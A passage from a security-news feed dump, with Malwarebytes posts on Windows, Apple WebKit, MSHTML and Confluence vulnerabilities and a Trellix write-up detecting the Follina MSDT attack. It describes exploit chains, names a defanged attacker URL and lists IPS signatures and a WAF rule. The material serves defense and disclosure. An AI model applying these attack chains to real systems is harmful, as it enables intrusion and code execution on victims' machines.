January 17, 2022, for some versions of Windows. This update addresses issues related to VPN connectivity, Windows Server Domain Controllers restarting, Virtual Machines start failures, and ReFS-formatted removable media failing to mount.&quot;\n\nThings being what they are, it\u2019s likely time to get in there and apply the OOB update (if you haven\u2019t already) and put this one to rest.\n\nMicrosoft is putting a fair bit of work into figuring out where weak points lie in the patching process, making use of its Update Connectivity data. The [current estimate](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/achieve-better-patch-compliance-with-update-connectivity-data/ba-p/3073356>) is a device needs a minimum of two continuous connected hours, and six total connected hours after an update is released to reliably make it through the updating process.\n\nIf this sounds like your network, and if you\u2019re still waiting to take the plunge, you\u2019ve hopefully got little to lose by making that big update splash as soon as you possibly can.\n\nThe post [Apply those updates now: CVE bypass offers up admin privileges for Windows 10](<https://blog.malwarebytes.com/malwarebytes-news/2022/02/apply-those-updates-now-cve-bypass-offers-up-admin-privileges-for-windows-10/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-01T11:07:29", "type": "malwarebytes", "title": "Apply those updates now: CVE bypass offers up admin privileges for Windows 10", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-01T11:07:29", "id": "MALWAREBYTES:6A30A2B661E06D2D7D26479F27BB0EF3", "href": "https://blog.malwarebytes.com/malwarebytes-news/2022/02/apply-those-updates-now-cve-bypass-offers-up-admin-privileges-for-windows-10/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T22:07:44", "description": "There are many reasons why we want a bug fixed as soon as we can, but there are also plenty of reasons why doing it \u201cright now\u201d is not an option. This phenomenon starts at the side of the developers. The average time to fix a bug seems to vary depending on the platform the bug was found in. What is one group doing better and can the others take lessons from that? Or is it something we have to take as it comes?\n\n&quot;Bug-fixing time&quot; refers to the time required to fix known bugs. So, on a per bug basis it is the time between being made aware of an existing bug and issuing a fix for the bug. The ability to better understand and predict bug-fixing time can help a project team better estimate software maintenance efforts and better manage software projects.\n\n## Reasons to fix ASAP\n\nThere are some very obvious reasons why we want to push and install bug fixes as soon as possible.\n\n * Improved security by fixing the vulnerability.\n * Even if a vulnerability is found by a researcher taking the high road of responsible disclosure, once the cat is out of the bag, there is a good chance others will be able to duplicate the researcher&#x27;s effort. This could result in a zero-day vulnerability.\n * When you are working on a new version, a critical bug in the old version is holding you back as long as you don\u2019t know how to fix it.\n * If the published timeline shows it has taken months to fix a bug it reflects badly on your company, and could lead customers to question whether you care about security.\n\nIn general, you can say that the bug-fixing time is an important factor for bug related analysis, such as measuring software quality. Having your software considered to be \u201cbuggy\u201d does not helps sales in any way. But situations may arise when you need to prioritize what needs to be fixed first.\n\n## Differences in platform\n\nLast month, the Project Zero team at Google looked at fixed bugs that were reported between January 2019 and December 2021. During this period, Project Zero reported 376 issues to vendors under their standard 90-day deadline.\n\nWhen [reading the data](<https://googleprojectzero.blogspot.com/2022/02/a-walk-through-project-zero-metrics.html>), it is important to note that the number of issues is too small and not chosen randomly enough to give a full picture, but it gives you an idea at least.\n\nVendor| Total bugs| Fixed by day 90| Fixed during grace period| Exceeded deadline and grace period| Avg days to fix \n---|---|---|---|---|--- \nApple| 84| 73 (87%)| 7 (8%)| 4 (5%)| 69 \nMicrosoft| 80| 61 (76%)| 15 (19%)| 4 (5%)| 83 \nGoogle| 56| 53 (95%)| 2 (4%)| 1 (2%)| 44 \nLinux| 25| 24 (96%)| 0 (0%)| 1 (4%)| 25 \nAdobe| 19| 15 (79%)| 4 (21%)| 0 (0%)| 65 \nMozilla| 10| 9 (90%)| 1 (10%)| 0 (0%)| 46 \nSamsung| 10| 8 (80%)| 2 (20%)| 0 (0%)| 72 \n \nOverall, the data show that almost all of the big vendors here are coming in under 90 days, on average.\n\n## Complaints from bug bounty hunters\n\nAt this point it should be pointed out that bugs reported by the Project Zero team are reported to vendors directly and will be taken very seriously by the vendors.\n\nIndividual bounty hunters, however, have been complaining about getting their bugs accepted. For example, in January we saw [CVE-2022-22587](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22587>), a vulnerability in Apple\u2019s IOMobileFrameBuffer, where a malicious app could execute random code with kernel privileges. This vulnerability ended up being a zero-day vulnerability that was exploited in the wild after one of them posted a Proof-of-Concept (PoC).\n\nMany researchers that don\u2019t want to report to vendors directly make use of the Zero-Day-Initiative (ZDI). The ZDI was created to encourage the reporting of zero-day vulnerabilities privately to the affected vendors by financially rewarding researchers, although there have been complaints from researchers that they didn\u2019t feel they were taken seriously by the ZDI.\n\n## The next step\n\nSo, yes, it&#x27;s important to fix vulnerabilities ASAP, but why does it take so long sometimes before these fixes and patches get installed?\n\nAccording to recent podcast guest Jess Dodson, the problem of patching isn\u2019t just a problem of resources\u2014time, staffing, funding\u2014but also of mindset. For some organizations, refusing to patch almost brings with it a bizarre sense of pride, Dodson said.\n\nThis video cannot be displayed because your _Functional Cookies_ are currently disabled. \n \nTo enable them, please visit our _[privacy policy](<https://www.malwarebytes.com/privacy/#how-we-collect-information>)_ and search for the Cookies section. Select _&quot;Click Here&quot;_ to open the Privacy Preference Center and select _&quot;Functional Cookies&quot;_ in the menu. You can switch the tab back to _&quot;Active&quot;_ or disable by moving the tab to _&quot;Inactive.&quot;_ Click _&quot;Save Settings.&quot;_\n\nFinally, even if you are not a Federal Civilian Executive Branch (FCEB) agency that needs to follow the [Binding Operation Directive 22-01](<https://www.cisa.gov/binding-operational-directive-22-01>), the CISA list known as the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) can act as a good guideline for your patch management strategy. This catalog provides FCEB agencies with a list of vulnerabilities that are known to be exploited in the wild and gives the agencies a due date by when the vulnerability needs to be patched in their organization.\n\nThe post [The struggle to reduce bug-fixing time is real](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/the-struggle-to-reduce-bug-fixing-time-is-real/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-03-07T20:06:37", "type": "malwarebytes", "title": "The struggle to reduce bug-fixing time is real", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-22587"], "modified": "2022-03-07T20:06:37", "id": "MALWAREBYTES:0CEEA2EDED4A06AE416CB7875CCE1C94", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/the-struggle-to-reduce-bug-fixing-time-is-real/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-02-11T14:18:19", "description": "Apple has released a security fix for a zero-day vulnerability ([CVE-2022-22620](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22620>)) that it says &quot;may have been actively exploited.&quot; According to the security update information provided by [Apple](<https://support.apple.com/en-us/HT213092>) the vulnerability exists in WebKit\u2014the HTML rendering engine component of its Safari browser\u2014and can be used by an attacker to create web content that may lead to arbitrary code execution.\n\nApple says it has addressed this vulnerability with improved memory management in iOS 15.3.1, iPadOS 15.3.1, macOS Monterey 12.2.1, and Safari 15.3.\n\n### Vulnerability\n\nThe vulnerability is a use-after-free (UAF) issue in WebKit that could lead to OS crashes and code execution on compromised devices. Use after free (UAF) is a type of vulnerability that results from the incorrect use of dynamic memory during a program\u2019s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code.\n\nThis issue can be exploited when WebKit processes HTML content. The attacker can exploit this vulnerability by luring users to visit a specially crafted web page. Once the user opens the malicious web page, an attacker can remotely execute malicious code on the targeted system. The vulnerability has been reported publicly as being exploited in the wild and was reported by an anonymous researcher.\n\nWebKit is the browser engine that powers Safari on Macs as well as all browsers on iOS and iPadOS (browsers on iOS and iPadOS are obliged to use it). It is also the web browser engine used by Mail, App Store, and many other apps on macOS, iOS, and Linux. \n\n### Affected devices\n\nUsers owning the following devices should install the update as soon as possible:\n\n * iOS 15.3.1 and iPadOS 15.3.1 can be found on iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).\n * macOS Monterey 12.2.1 for all systems running macOS Monterey (MacBooks, iMacs, Mac minis, and Mac Pros)\n * All devices running macOS Big Sur and macOS Catalina which are using Safari.\n\nStay safe, everyone!\n\nThe post [Update now! Apple fixes actively exploited zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/02/update-now-apple-fixes-actively-exploited-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-02-11T11:27:06", "type": "malwarebytes", "title": "Update now! Apple fixes actively exploited zero-day", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-11T11:27:06", "id": "MALWAREBYTES:180975C3E3516E431BF7664666327048", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/02/update-now-apple-fixes-actively-exploited-zero-day/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-25T08:35:08", "description": "Malwarebytes has reason to believe that the [MSHTML vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/windows-mshtml-zero-day-actively-exploited-mitigations-required/>) listed under [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) is being used to target Russian entities. The Malwarebytes Intelligence team has intercepted email attachments that are specifically targeting Russian organizations.\n\nThe first template we found is designed to look like an internal communication within JSC GREC Makeyev. The Joint Stock Company State Rocket Center named after Academician V.P. Makeyev is a strategic holding of the country&#x27;s defense and industrial complex for both the rocket and space industry. It is also the lead developer of liquid and solid-fuel strategic missile systems with ballistic missiles, making it one of Russia&#x27;s largest research and development centers for developing rocket and space technology.\n\nThe email claims to come from the Human Resources (HR) department of the organization.\n\nA phishing email targeted at the Makeyev State Rocket Center, posing at its own HR department \n\nIt says that HR is performing a check of the personal data provided by employees. The email asks employees to please fill out the form and send it to HR, or reply to the mail. When the receiver wants to fill out the form they will have to enable editing. And that action is enough to trigger the exploit.\n\nThe attack depends on MSHTML loading a specially crafted ActiveX control when the target opens a malicious Office document. The loaded ActiveX control can then run arbitrary code to infect the system with more malware.\n\nThe second attachment we found claims to originate from the Ministry of the Interior in Moscow. This type of attachment can be used to target several interesting targets.\n\nA phishing email posing as the Russian Ministry of the Interior\n\nThe title of the documents translates to \u201cNotification of illegal activity.\u201d It asks the receiver to please fill out the form and return it to the Ministry of Internal affairs or reply to this email. It also urges the intended victim to do so within 7 days.\n\n### Russian targets\n\nIt is rare that we find evidence of cybercrimes against Russian targets. Given the targets, especially the first one, we suspect that there may be a state-sponsored actor behind these attacks, and we are trying to find out the origin of the attacks. We will keep you informed if we make any progress in that regard.\n\n### Patched vulnerability\n\nThe CVE-2021-40444 vulnerability may be old-school in nature (it involves ActiveX, remember that?) but it was only recently discovered. It wasn&#x27;t long before threat actors were sharing PoCs, tutorials and exploits on hacking forums, so that everyone was able to follow step-by-step instructions in order to launch their own attacks.\n\nMicrosoft quickly published mitigation instructions that disabled the installation of new ActiveX controls, and managed to squeeze a [patch into its recent Patch Tuesday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-printnightmare-over-mshtml-fixed-a-new-horror-appears-omigod/>) output, just a few weeks after the bug became public knowledge. However, the time it takes to create a patch is often dwarfed by the time it takes people to apply it. Organizations, especially large ones, are often found trailing far behind with applying patches, so we expect to see more attacks like this.\n\n\u0411\u0443\u0434\u044c\u0442\u0435 \u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0432\u0441\u0435!\n\nThe post [MSHTML attack targets Russian state rocket centre and interior ministry](<https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-22T19:16:56", "type": "malwarebytes", "title": "MSHTML attack targets Russian state rocket centre and interior ministry", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-22T19:16:56", "id": "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "href": "https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-03T21:56:15", "description": "[Researchers](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>) found a vulnerability in Atlassian Confluence by conducting an incident response investigation. Atlassian rates the severity level of this vulnerability as critical.\n\nAtlassian has issued a [security advisory ](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>)and is working on a fix for the affected products. This qualifies the vulnerability as an actively exploited in the wild zero-day vulnerability.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This vulnerability is listed as [CVE-2022-26134](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134>).\n\n## Confluence\n\nAtlassian Confluence is a collaboration tool in wiki style. Confluence is a team collaboration platform that connects teams with the content, knowledge, and their co-workers, which helps them find all the relevant information in one place. Teams use it to work together on projects and share knowledge.\n\nConfluence Server is the on-premises version which is being phased out. Confluence Data Center is the self-managed enterprise edition of Confluence.\n\n## The vulnerability\n\nThe description of CVE-2022-26134 says it is a critical unauthenticated remote code execution vulnerability in Confluence Server and Confluence Data Center.\n\nDuring the investigation, the researchers found JSP web shells written to disk. JSP (Jakarta Server Pages or Java Server Pages) is a server-side programming technology that helps software developers create dynamically generated web pages based on HTML, XML, SOAP, or other document types. JSP is similar to PHP and ASP, but uses the Java programming language.\n\nIt became clear that the server compromise stemmed from an attacker launching an exploit to achieve remote code execution. The researchers were able to recreate that exploit and identify a zero-day vulnerability impacting fully up-to-date versions of Confluence Server.\n\nAfter the researchers contacted Atlassian, Atlassian confirmed the vulnerability and subsequently assigned the issue to CVE-2022-26134. It confirmed the vulnerability works on current versions of Confluence Server and Data Center.\n\n## The attack\n\nThe researchers at Volexity were unwilling to provide any details about the attack method since there is no patch available for this vulnerability. However, they were able to provide some details about the shells that were dropped by exploiting the vulnerability.\n\nA web shell is a a malicious script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)\n\nThis web shell was identified as the China Chopper web shell. The China Chopper web shell is commonly used by malicious Chinese actors, including advanced persistent threat (APT) groups, to remotely control web servers. The web shell has two parts, the client interface and the small (4 kilobytes in size) receiver host file on the compromised web server. But access logs seemed to indicate that the China Chopper web only served as a means of secondary access.\n\nOn further investigation they found bash shells being launched by the Confluence web application process. This stood out because it had spawned a bash process which spawned a Python process that in turn spawned a bash shell. Bash is the default shell for many Linux distros and is short for the GNU Bourne-Again Shell.\n\nResearch showed that the web server process as well as the child processes created by the exploit were all running as root (with full privileges) user and group. These types of vulnerabilities are dangerous, as it allows attackers to execute commands and gain full control of a vulnerable system. They can even do this without valid credentials as long as it is possible to make web requests to the Confluence system.\n\nAfter successfully exploiting the Confluence Server systems, the attacker immediately deployed an in-memory copy of the BEHINDER implant. BEHINDER provides very powerful capabilities to attackers, including memory-only web shells and built-in support for interaction with [Meterpreter](<https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/>) and [Cobalt Strike](<https://blog.malwarebytes.com/glossary/cobalt-strike/>).\n\n## Mitigation\n\nThere are currently no fixed versions of Confluence Server and Data Center available. In the interim, users should work with their security team to consider the best course of action. Options to consider include:\n\n * Restricting access to Confluence Server and Data Center instances from the internet.\n * Disabling Confluence Server and Data Center instances.\n * If you are unable to take the above actions, implementing a WAF (Web Application Firewall) rule which blocks URLs containing **${** may reduce your risk.\n\n_Note: **${** is the first part of a parameter substitution in a shell script_\n\n## Affected versions\n\nAll supported versions of Confluence Server and Data Center are affected. And according to Atlassian it\u2019s likely that **all** versions of Confluence Server and Data Center are affected, but they are still investigating and have yet to confirm the earliest affected version.\n\nOne important exception: if you access your Confluence site via an atlassian.net domain. This means it is hosted by Atlassian and is not vulnerable.\n\nWe will keep you posted about the developments, so stay tuned.\n\n## Update June 3, 2022\n\nAtlassian has released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contain a fix for this issue.\n\n**What You Need to Do**\n\nAtlassian recommends that you upgrade to the latest Long Term Support release. For a full description of the latest version, see the [Confluence Server and Data Center Release Notes](<https://confluence.atlassian.com/doc/confluence-release-notes-327.html>). You can download the latest version from the [download centre](<https://www.atlassian.com/software/confluence/download-archives>).\n\nThe post [[updated]Unpatched Atlassian Confluence vulnerability is actively exploited](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-06-03T14:41:58", "type": "malwarebytes", "title": "[updated]Unpatched Atlassian Confluence vulnerability is actively exploited", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-03T14:41:58", "id": "MALWAREBYTES:CA300551E02DA3FFA4255FBA0359A555", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/", "cvss": {"score": 0.0, "vector": "NONE"}}], "trellix": [{"lastseen": "2022-07-19T00:00:00", "description": "# Countering Follina Attack (CVE- 2022-30190) with Trellix Network Security Platform\u2019s Advanced Detection Features\n\nBy Vinay Kumar and Chintan Shah \u00b7 July 19, 2022\n\n## Executive summary\n\nDuring the end of May 2022, independent security researcher reported a vulnerability (assigned CVE-2022-30190) in Microsoft Support Diagnostic Tool (MSDT), which could be exploited to execute arbitrary code when MSDT is called using URI protocol. The URI protocol **ms-msdt:/** could also be invoked from the malicious word document, which when opened by the victim, would allow malicious code to execute on the target machine with the privileges of the calling application. In response to the reported vulnerability, Microsoft released [the advisory and guidance](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on disabling the MSDT URI protocol. Subsequently, the vulnerability, was patched in the [June security updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) released by Microsoft. Since then, this vulnerability has been found to be exploited by multiple state actors in [targeted attack campaigns](<https://www.bleepingcomputer.com/news/security/windows-msdt-zero-day-now-exploited-by-chinese-apt-hackers/>).\n\nAt Trellix, we are committed to protecting our customers from upcoming and emerging threats on the network inclusive of those that are found being exploited in the wild. Trellix Network Security Platform\u2019s (Trellix NSP) Intrusion Prevention Research Team strives to build advanced detection features , improving product\u2019s overall Threat Detection capabilities.\n\nOver the next few sections of this blog, we will highlight couple of advanced detection features in Trellix NSP, which helps in protecting the customers against this and future attacks of similar nature.\n\n## Introduction \n\nMS Word document exploiting Microsoft Support Diagnostic Tool vulnerability ( CVE- 2022-30190 ) was first found to be [submitted to VT](<https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/>) on 27th May 2022 from Belarus with the file name **05-2022-0438.doc**. However, the number 0438 turns out to be the Area code of the region **Follina** in Italy and hence the name. Exploit document is not found to be connected to Italy in any way.\n\n Figure 1: Sample submission history on VirusTotal \n\n\nThere is no dearth of instances where one of the MS Office\u2019s core features, Object Linking and Embedding ( OLE ) have been abused as an initial attack vector and CVE-2022-30190 was no different. This was yet another classic example of chaining OLE with another logic flaw to achieve arbitrary code execution on the target machine. Traditionally, Object Linking and Embedding had significantly contributed to building weaponized office exploits, and we believe this will continue to happen. As with previous CVE-2021-40444 and many other exploits, OLE was found to be used for linking the document to the externally hosted object, in this case, html file. \n\n[MS Office Open XML specifications](<https://www.ecma-international.org/publications-and-standards/standards/ecma-376/>) mentions that an Office Open XML document facilitates embedding objects or link to external objects which can be specified via relationships. Any embedded or linked object specified in the container application ( OOXML document in this case ) must be identified by its unique **ProgID** string. As per the specifications, this string must be used to determine the type and the application used to load the object data. An excerpt from the document specifications is as shown below:\n\n Figure 2: Specs on Embedded objects \n\n\nAs documented in the [ISO-29500-4 specifications](<https://standards.iso.org/ittf/PubliclyAvailableStandards/c071692_ISO_IEC_29500-4_2016.zip>) ST_OLEType defines the type of the OLE object in **document.xml**, either linked or embedded and the **ProgID=\u201dhtmlfile\u201d** indicates the type of linked object data. As shown in the CVE-2022-30190 exploit document below, **document.xml.rels** file with Type attribute specifying relationship as \u201coleObject\u201d, **Target** attribute set to the OLE object link and **TargetMode** set as external. This allows the crafted document to link to the externally hosted potentially malicious object and invoke the respective protocol handlers for rendering the object which could lead to the exploitation of potential logic flaws in object renderers.\n\n Figure 3: Structure of exploit document \n\n\nAs we notice the document.xml.rels file, it contains an external reference to the malicious domain for retrieving the html file :\n\n**hxxps://www.xmlformats.com/office/word/2022/wordprocessingDrawing/RDF842l.html!**. Hosted html file on this domain contains script block with commented lines. This is required for making the HTML file sufficiently sized ( precisely greater than 4KB ) to be able to get it processed and rendered by mshtml.dll. \n\n Figure 4: downloaded html file from server \n\n\nSubsequently, script tries to invoke PCWDiagnostic package using MSDT URI protocol handler with multiple arguments out of which one argument is IT_BrowseForFile which can take embedded PowerShell script within $( ) as an argument , resulting into code execution. PowerShell script is Base64 encoded and decoded form is of the script is as shown below. \n\n Figure 5: Decoded PowerShell script \n\n\nAs we see in the decoded payload, the script is intended to run the malicious rgb.exe on the target system. Summarizing the sequence involved in the attack:\n\n * Malicious MS office document with linked object is delivered to the victim possibly, as a part of phishing campaign.\n * On clicking the document, malicious HTML script is rendered, leading to arbitrary code execution on the affected system. \n\nWindows system registers innumerable number of URI protocol handlers which could be potentially abused to exploit similar flaws. For instance, [search-ms](<https://docs.microsoft.com/en-us/windows/win32/search/getting-started-with-parameter-value-arguments>) URI protocol handler , used to query windows search indexing feature can be abused by the attackers to connect to the remote SMB share on the attacker-controlled server. However, it does not directly lead to code execution as it requires multiple levels of user interaction, but a query can be crafted to lure the users to execute legitimate looking executables as shown below. Both these of URI protocol attacks were first [reported here](<https://benjamin-altpeter.de/shell-openexternal-dangers/>).\n\n Figure 6: search-ms query to connect to remote location \n\n\n**How Trellix NSP protects against Follina**\n\nTrellix NSP has been one of the most advance and mature IPS in the security industry. Over a period, we developed some of the cutting-edge features to deal with complex attack scenarios which involved handling encoding, compressions, and complex file formats. **Microsoft Office Deep File Inspection** and **Multi Attack ID Correlation** being some of these. We use combination of these advance capabilities to detect entire attack cycle. In the following sections, we will try to understand how Trellix Network Security Platform\u2019s advanced inspection capabilities highlighted above can help correlate multiple low or medium severity events to detect phases in the attack cycle, thereby raising overall confidence level.\n\n**Microsoft Open Office XML(OOXML) file format**\n\nOLE File format which was traditionally used in Microsoft office is replaced with Office open xml. Office Open XML (OOXML) is a zipped, XML-based file format developed by Microsoft for representing spreadsheets, charts, presentations, and word processing documents. In a nutshell this means that the whole document is contained in a zip package. Multiple files and directories together form the document. There are directories like _[Content_Types].xml , _rels, docProps_, which are basic part of all office zip packages, and then there is a directory specific to document type _(word directory for docx, xl and ppt directory for xlsx and pptx respectively)_. For each of the document type the specific directory would contain different files limited to the type. Like in case of a docx type, the \u2018word\u2019 directory contains document.xml file which has the core content of the document. Here is a brief overview about important files under these directories: \n\n**[Content_Types].xml** \nThis file contains the MIME type information for parts of the package. It uses defaults for certain file extensions and overrides for parts specified by Internationalized Resource Identifier.\n\n**_rels** \nThis directory contains the relationship information for files within the package.\n\n**_rels/.rels** \nThis is the location where applications look first to find the package relationships.\n\n**docProps/core.xml** \nThis file contains the core properties for any Office Open XML document.\n\n**word/document.xml** \nThis file is the main part for any Word document.\n\nZip file format specification specifies that a file in the zip archive is stored in a file record structure. For each file in the zip archive, there is a corresponding entry of this structure. \n\n[local file header 1] \n[file data 1] \n[data descriptor 1] \n. \n. \n. \n[local file header n] \n[file data n] \n[data descriptor n] \n \n[archive decryption header] \n[archive extra data record] \n[central directory header 1] \n. \n. \n. \n[central directory header n] \n[zip64 end of central directory record] \n[zip64 end of central directory locator] \n[end of central directory record]\n\nThese structures are placed one after another, structure starts with local file header followed by optional Extra Data Fields and file data (optionally compressed/optionally encrypted). Local header contains details about the file data, encryption/compression mechanism along with filename, file size and few more things.\n\n**Local file header**\n\nOffset | Byte | Description \n---|---|--- \n0 | 4 | Local file header signature # 0x04034b50 (read as a little-endian number) \n4 | 2 | Version needed to extract (minimum) \n6 | 2 | General purpose bit flag \n8 | 2 | Compression method \n10 | 2 | File last modification time \n12 | 2 | File last modification date \n14 | 4 | CRC-32 \n18 | 4 | Compressed size \n22 | 4 | Uncompressed size \n26 | 2 | File name length (n) \n28 | 2 | Extra field length (m) \n30 | n | File Name \n30+n | m | Extra Field \n0 | 4 | Local file header signature # 0x04034b50 (read as a little-endian number) \n4 | 2 | Version needed to extract (minimum) \n6 | 2 | General purpose bit flag \n \n \n\n\nFor Microsoft documents, deflate compression is used commonly. In a nutshell, the files which constitutes the document are stored in possibly encrypted/compressed format inside the zip package. In the figure below, we dissect this structure for document.xml file present under word directory with a hex editor (010 editor) with zip parsing capabilities which will help us to investigate the details \u2013\n\n Figure 7: Structure for document.xml \n\n\n**Need for deep file inspection**\n\nWe have seen in the past that different vulnerabilities may require the IPS devices to examine the content of the different files present inside zip package. Same is the case with Follina. As explained earlier, this vulnerability abuses Microsoft OOXML **Object Linking and Embedding** functionality linking a file to external resource via the relationship file to load malicious content. Hence it requires the detection device to check the external references used in word/rels/document.xml.rels file. \n\n Figure 8: Structure of document.xml.rels \n\n\nSince this file is present, as a compressed entity in the zip archive, a meaningful detection with IPS cannot be done until the file is decompressed. With NSP\u2019s unique in industry capability, known as Deep File inspection, this is possible. \n\nThis is implemented using protocol parsing capability of the NSP. The local file header structure for the specific file is parsed and the compressed data of the file is decoded. This feature can be used by enabling it from the inspection option policy.\n\n Figure 9: Policy configuration to enable MS Office Deep File Inspection \n\n\n_For more details, please refer to NSP documentation_\n\n**Some of the key highlights: deep file inspection **\n\n * This feature helps to decompress the file contents inline; the complete file is not required to be downloaded for inspection \n * It also gives the flexibility to decompress only the content of a selected file (individual file present inside zip achieve), yielding better performance since the whole zip archive is not required to be decompressed .\n * The individual files (which are part of zip package) can be controllably decompressed by specifying byte limit per file. This plays a great role in improving performance while doing inline inspection.\n\nTrellix NSP Attack ID **0x452a8400 - HTTP: OLE Object Linking Detected in OOXML File** \u2013 uses the Microsoft Office Deep file inspection feature to detect signs of external object linking. However, just checking for external OLE references will not be sufficient until it is ascertained that the external URI does the malicious activity. Since we know that external URI loads the HTML which invokes the MSDT handler in a malicious fashion. \n\nInvoking MSDT through HTML content is detected by Trellix NSP Attack ID **0x452ac200 \u2013 HTTP: Microsoft Support Diagnostic Tool Remote Code Execution Vulnerability (CVE-2022-30190)**\n\n**Detecting the attack chain using multi attack ID Correlation**\n\nThe attack visualization is better when the dots can be connected between different stages of the attack. Multi Attack ID Correlation capability helps achieve this by correlating multiple attacks. \n\nTrellix NSP Attack ID **0x43f02000 HTTP: Microsoft Support Diagnostic Tool RCE Vulnerability (CVE-2022-30190)** utilizes this capability and correlates \u201cHTTP: OLE Object Linking Detected in OOXML File (0x452a8400) \u201d and \u201cHTTP: Microsoft Support Diagnostic Tool Remote Code Execution Vulnerability (CVE-2022-30190) (0x452ac200)\u201d to generate corelated attack event. \n\nThe alert generated using Multi AID correlation is of high confidence and severity and helps security admins to take further actions. This feature is built into Trellix NSP by default and there is no extra configuration required to enable it. \n\n**Some of the key highlights: multi attack ID Correlation **\n\n * Two or more attacks can be correlated \n * Provides capability to quarantine the attacker (configurable from the policy)\n * Correlation using attributes like \u2013 \n * source-IP/destination IP: This attribute helps correlating attack originating from same source IP and/or targeted to the same destination IP .\n * Lifetime: max time interval in which all correlation signature event should occur\n * Threshold: Detection of attack happening repeatedly in a specific period.\n\nWith these strong correlation capabilities for the complete attack cycle, Trellix Network Security Platform\u2019s Threat Detection solution balances the effectiveness and performance extremely well. The Trellix NSP research and Engineering team actively monitors and keeps an eye on emerging threat patterns ,builds the features and capabilities to enhance overall detection efficacy of the Intrusion Prevention System. \n\n## Conclusion \n\nWe have seen multiple vulnerabilities in the past using exploitation techniques similar in nature and this is yet another addition to the series. In our previous blog, outlining the current state of memory corruption vulnerabilities and the challenges faced in exploiting them, we also highlighted the exploitation strategies of the future and the **Follina** attack very well validates our prediction. While exploiting different classes of memory corruption vulnerabilities can be eliminated by introducing mitigations as either operating system or hardware level, vulnerabilities exploiting design flaws will 